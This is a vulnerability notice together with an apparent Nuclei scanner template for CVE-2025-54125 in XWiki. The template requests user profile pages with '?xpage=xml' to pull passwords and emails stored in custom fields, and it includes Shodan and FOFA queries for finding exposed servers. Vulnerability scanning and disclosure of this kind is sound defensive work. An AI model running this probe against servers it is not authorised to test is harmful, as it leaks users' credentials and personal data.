A vulnerability in XWiki's XML view functionality exposes sensitive information such as passwords and email addresses that are stored in custom fields not explicitly named as password or email. This information disclosure occurs when accessing user profiles with the xml.vm template.
PoC code [publicly available]
id: CVE-2025-54125
info:
  name: XWiki XML View - Sensitive Information Exposure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in XWiki's XML view functionality exposes sensitive information such as passwords and email addresses that are stored in custom fields not explicitly named as password or email. This information disclosure occurs when accessing user profiles with the xml.vm template.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-22810
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-359
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,exposure,vkev
http:
  - method: GET
    path:
      - "{{BaseURL}}{{path}}"
    payloads:
      path:
        - "/bin/view/XWiki/{{username}}?xpage=xml"
        - "/xwiki/bin/view/XWiki/{{username}}?xpage=xml"
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type, 'text/xml')"
          - "contains_all(body, '<users>', '<property>', '<author>', '<email>')"
        condition: and
# digest: 490a0046304402200f304d67714b41aeef875435e9713c9521b16d23e634c08735e044756a35153902207964745cbd65c5be18453c63948fd3efffcf449d511f6cedd20b5f5d6ed29e90:922c64590222798bb761d5b6d8e72950